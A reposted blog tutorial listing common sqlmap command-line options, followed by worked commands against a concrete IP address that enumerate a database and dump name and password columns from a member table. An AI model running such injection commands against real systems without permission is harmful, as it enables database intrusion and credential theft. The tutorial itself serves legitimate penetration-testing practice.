当前位置:网站首页>sqlmap injection tutorial common commands
sqlmap injection tutorial common commands
2022-07-31 05:53:00 【not used to having you】
sqlmap injection tutorial common commands
sqlmap official website: sqlmap: automatic SQL injection and database takeover tool
sqlmap documentation address: https://github.com/sqlmapproject/sqlmap/wiki/Usage
–hh help manual in detailHighlights
sqlmap.py -u "Injection Address" --dbs // List databases
sqlmap.py -u "Injection Address" --current-db // Current database
sqlmap.py -u "injection address" --users // column database user
sqlmap.py -u "injection address" --current-user // current user
sqlmap.py -u "injection address" --tables -D ""Database" // List the table name of the database
sqlmap.py -u "Injection address" --columns -T "Table name" -D "Database" // Get the column name of the table
sqlmap.py -u"Injection address" --dump -C "Column name" -T "Table name" -D "Database" //Get the column information of the following table in the databaseIt is best to add --level 3 --risk2 after the command, which can increase the depth and speed of scanning
--delay=1 means to send one packet per second
For example:
sqlmap.py -u "http://219.153.49.228:44109/new_list.php?id=1" --dbs //Explosive library
sqlmap.py -u"http://219.153.49.228:44109/new_list.php?id=1" -D stormgroup --tables //burst table
sqlmap.py -u "http://219.153.49.228:44109/new_list.php?id=1” -D stormgroup -T member --columns burst list
sqlmap.py -u “http://219.153.49.228:44109/new_list.php?id=1” -D stormgroup -T member-C name,password --dump burst field value
Respect originality:
Loaded at: https://www.csdn.net/tags/NtjaAgzsNDk2NTMtYmxvZwO0O0OO0O0O.html
边栏推荐
猜你喜欢

MySQL高级语句(一)

leetcode-每日一题剑指 Offer II 041. 滑动窗口的平均值(队列模拟)

Why is the redis single-threaded also so fast?

leetcode-每日一题565. 数组嵌套(标记图和并查集)

gin框架学习-Gin框架和Gorm框架搭建一个简单的API微服务

Linux modify MySQL database password

Qt Creator + CMake 运行调试总会自动 build 所有目标

The process and specific code of sending SMS verification code using flask framework
![[Elastic-Job source code analysis] - job listener](/img/99/5e047b1aa83aad7d7f17b4eec606e6.png)
[Elastic-Job source code analysis] - job listener

Sword Point Offer Special Assault Edition ---- Day 1
随机推荐
02 【el和data的两种写法 MVVM模型】
字符串的新增方法
最新MySql安装教学,非常详细
let和const命令
Three-party login using wallet Metamask based on web3.0
Install mysqldb in mac10.14
GUCCI, LV and other luxury giant universe how to layout yuan, other brands should keep up with?
Redis first meeting
vulhub靶场学习日记hackme1
Qt Creator + CMake 运行调试总会自动 build 所有目标
带你搞懂MySQL隔离级别,两个事务同时操作同一行数据会怎样?
leetcode-829. 连续整数求和(数论)
【云原生】开源数据分析 SPL 轻松应对 T+0
对于输出点是时间戳的渗透测试方法(以Oracle数据库为例)
SQL注入中数据库的判断
年终总结——岁月静好~
10 【组件编码流程 组件自定义事件 全局事件总线】
leetcode-每日一题731. 我的日程安排表 II
对递归的一些感悟
leetcode-每日一题873. 最长的斐波那契子序列的长度(哈希和二分)